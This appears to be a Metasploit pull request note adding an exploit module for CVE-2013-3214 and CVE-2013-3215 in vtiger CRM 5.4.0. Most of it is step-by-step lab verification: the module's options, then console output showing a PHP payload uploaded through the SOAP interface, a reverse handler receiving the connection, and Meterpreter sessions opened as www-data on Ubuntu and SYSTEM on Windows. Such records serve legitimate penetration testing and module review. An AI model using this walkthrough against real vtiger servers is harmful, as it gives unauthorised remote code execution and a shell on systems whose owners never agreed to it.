Add module for CVE-2013-3214, CVE-2013-3215

[jvazquez-r7]

Tested with vtiger CRM 5.4.0 on Windows 2003 SP2 and Ubuntu 10.0.4. Info about how to test in both OSes is included.

Verification on Linux

• Download and install Vtiger CRM 5.4.0 http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.4.0/Core%20Product/vtigercrm-5.4.0.tar.gz/download
• Modifying your php.ini file is the easiest way to make the SOAP interface to work: Add the vtiger install dir to the include_path. For example:

include_path = ".:/var/www/vtigercrm"

• Reload / Restart apache to have into account the php configuration change.
• use the exploit to get a session (check can use to detect if your soap interface is really available and vulnerable)

msf > use exploit/multi/http/vtiger_soap_upload 
msf exploit(vtiger_soap_upload) > show options

Module options (exploit/multi/http/vtiger_soap_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /vtigercrm/      yes       Base vTiger CRM directory path
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   vTigerCRM v5.4.0


msf exploit(vtiger_soap_upload) > set rhost 192.168.172.133
rhost => 192.168.172.133
msf exploit(vtiger_soap_upload) > check
[+] The target is vulnerable.
msf exploit(vtiger_soap_upload) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.133:80 - Uploading payload...
[+] 192.168.172.133:80 - Upload successfully uploaded
[*] 192.168.172.133:80 - Executing payload...
[*] Sending stage (39848 bytes) to 192.168.172.133
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:49587) at 2014-01-02 11:20:38 -0600
[+] Deleted WwuBmyiXquzIrZt.php


^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > pwd
/var/www/vtigercrm/soap
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(vtiger_soap_upload) > 

Verification on Windows

• Download and install Vtiger CRM 5.4.0 http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.4.0/Core%20Product/vtigercrm-5.4.0.exe/download
• Modifying the php.ini file is the easiest way to make the SOAP interface to work. By default you need to modify C:\Program Files\vtigercrm-5.4.0\php.ini. Add the vtiger install dir to the include_path, by default:

include_path = ".;C:\Program Files\vtigercrm-5.4.0\apache\htdocs\vtigerCRM"

• Restart the vTiger to be sure the new php configuration applies
• use the exploit to get a session (check can use to detect if your soap interface is really available and vulnerable). On the sample the default options for the windows install are used:

msf exploit(vtiger_soap_upload) > set rhost 192.168.172.136
rhost => 192.168.172.136
msf exploit(vtiger_soap_upload) > set rport 8888
rport => 8888
msf exploit(vtiger_soap_upload) > set TARGETURI /
TARGETURI => /
msf exploit(vtiger_soap_upload) > check
[+] The target is vulnerable.
msf exploit(vtiger_soap_upload) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:8888 - Uploading payload...
[+] 192.168.172.136:8888 - Upload successfully uploaded
[*] 192.168.172.136:8888 - Executing payload...
[*] Sending stage (39848 bytes) to 192.168.172.136
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.136:2631) at 2014-01-02 11:24:18 -0600
[+] Deleted zmxLprRAcSXnWie.php

^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
eComputer    : JUAN-6ED9DB6CA8
OS          : Windows NT JUAN-6ED9DB6CA8 5.2 build 3790
Meterpreter : php/php
meterpreter > pwd
eC:\Program Files\vtigercrm-5.4.0\apache\htdocs\vtigerCRM\soap
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(vtiger_soap_upload) >